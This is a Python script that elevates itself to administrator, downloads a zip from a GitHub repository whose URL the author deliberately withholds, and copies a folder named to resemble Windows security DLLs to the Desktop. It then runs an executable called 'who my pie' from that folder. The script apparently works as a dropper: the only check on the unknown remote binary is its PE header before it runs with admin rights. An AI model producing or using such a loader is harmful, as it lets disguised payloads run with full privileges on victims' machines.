import os
import sys
import ctypes
import tempfile
import zipfile
import shutil
import requests
import subprocess
from pathlib import Path

# ------------------------------------------------------------
# Config
# ------------------------------------------------------------
GITHUB_REPO = " i dont want to give u my GitHub repo but it works tho "
BRANCH = "main"
FOLDER_KEYWORDS = ["windows", "security", "dlls"]   # The folder we're looking for
EXE_NAME = "who my pie"                              # without .exe
PERMANENT_FOLDER = os.path.join(os.path.expanduser("~"), "Desktop", "ExtractedFiles")

# ------------------------------------------------------------
# Helpers
# ------------------------------------------------------------
def log(msg):
    print(f"[*] {msg}")
    sys.stdout.flush()

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def run_as_admin():
    script = sys.argv[0]
    params = ' '.join([f'"{arg}"' for arg in sys.argv[1:]])
    ctypes.windll.shell32.ShellExecuteW(
        None, "runas", sys.executable, f'"{script}" {params}', None, 1
    )
    sys.exit(0)

def is_windows_exe(filepath):
    try:
        with open(filepath, 'rb') as f:
            if f.read(2) != b'MZ':
                return False
            f.seek(0x3C)
            pe_offset = int.from_bytes(f.read(4), byteorder='little')
            f.seek(pe_offset)
            if f.read(4) != b'PE\x00\x00':
                return False
        return True
    except:
        return False

def find_folder_by_keywords(root_dir, keywords):
    for dirpath, dirnames, _ in os.walk(root_dir):
        for dirname in dirnames:
            lower = dirname.lower()
            if all(kw.lower() in lower for kw in keywords):
                return os.path.join(dirpath, dirname)
    return None

def find_exe_recursive(directory, exe_basename):
    for root, _, files in os.walk(directory):
        for file in files:
            name, ext = os.path.splitext(file)
            if ext.lower() == '.exe' and name.lower() == exe_basename.lower():
                return os.path.join(root, file)
    return None

# ------------------------------------------------------------
# Main
# ------------------------------------------------------------
def main():
    # Elevate to admin if needed
    if not is_admin():
        log("Requesting administrator privileges...")
        run_as_admin()
    log("Running with administrator privileges.")

    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            tmp = Path(tmpdir)
            repo_zip = tmp / "repo.zip"

            # Download repo
            url = f"{GITHUB_REPO}/archive/refs/heads/{BRANCH}.zip"
            log(f"Downloading repository from {url} ...")
            try:
                response = requests.get(url, stream=True)
                response.raise_for_status()
            except requests.HTTPError:
                log(f"Branch '{BRANCH}' not found, trying 'master' ...")
                url = f"{GITHUB_REPO}/archive/refs/heads/master.zip"
                response = requests.get(url, stream=True)
                response.raise_for_status()
            with open(repo_zip, 'wb') as f:
                for chunk in response.iter_content(chunk_size=8192):
                    f.write(chunk)
            log("Download complete.")

            # Extract repo
            repo_extract = tmp / "repo"
            log("Extracting repository...")
            with zipfile.ZipFile(repo_zip, 'r') as zf:
                zf.extractall(repo_extract)

            # The actual content is inside a single top‑level folder (e.g., nexusdesgin‑main)
            top_dirs = [d for d in repo_extract.iterdir() if d.is_dir()]
            if not top_dirs:
                log("ERROR: No directory found inside the repo ZIP.")
                input("Press Enter to exit...")
                return
            repo_root = top_dirs[0]
            log(f"Repository root: {repo_root}")

            # Find the target folder (e.g., 'windows security dlls')
            log("Searching for folder containing 'windows', 'security', 'dlls' ...")
            target_folder = find_folder_by_keywords(str(repo_root), FOLDER_KEYWORDS)
            if not target_folder:
                log("ERROR: Could not find the folder. Listing all top‑level items for debug:")
                for item in os.listdir(repo_root):
                    log(f"  {item}")
                input("Press Enter to exit...")
                return
            log(f"Found folder: {target_folder}")

            # Copy the whole folder to the Desktop so the exe can keep its files
            log(f"Copying folder to {PERMANENT_FOLDER} ...")
            if os.path.exists(PERMANENT_FOLDER):
                shutil.rmtree(PERMANENT_FOLDER)
            shutil.copytree(target_folder, PERMANENT_FOLDER)
            log("Folder copied.")

            # Find the exe inside it
            log(f"Searching for '{EXE_NAME}.exe' ...")
            exe_path = find_exe_recursive(PERMANENT_FOLDER, EXE_NAME)
            if not exe_path:
                log("ERROR: Could not find the executable.")
                log("Contents of the folder:")
                for root, dirs, files in os.walk(PERMANENT_FOLDER):
                    for f in files:
                        log(f"  {os.path.join(root, f)}")
                input("Press Enter to exit...")
                return
            log(f"Found: {exe_path}")

            # Verify it's a real Windows executable
            log("Verifying Windows executable header...")
            if not is_windows_exe(exe_path):
                log("ERROR: The file is not a valid Windows executable (missing MZ/PE header).")
                input("Press Enter to exit...")
                return
            log("Valid PE executable confirmed.")

            # ---------- THE ONLY CHANGE ----------
            # Launch in a NEW console window
            log(f"Launching {exe_path} in a new console window...")
            subprocess.Popen(
                [exe_path],
                cwd=os.path.dirname(exe_path),
                creationflags=subprocess.CREATE_NEW_CONSOLE   # <--- NEW
            )
            log("Executable started in its own console. All files are on your Desktop inside 'ExtractedFiles'.")

    except Exception as e:
        log(f"Unexpected error: {e}")

    input("Press Enter to exit...")

if __name__ == "__main__":
    main()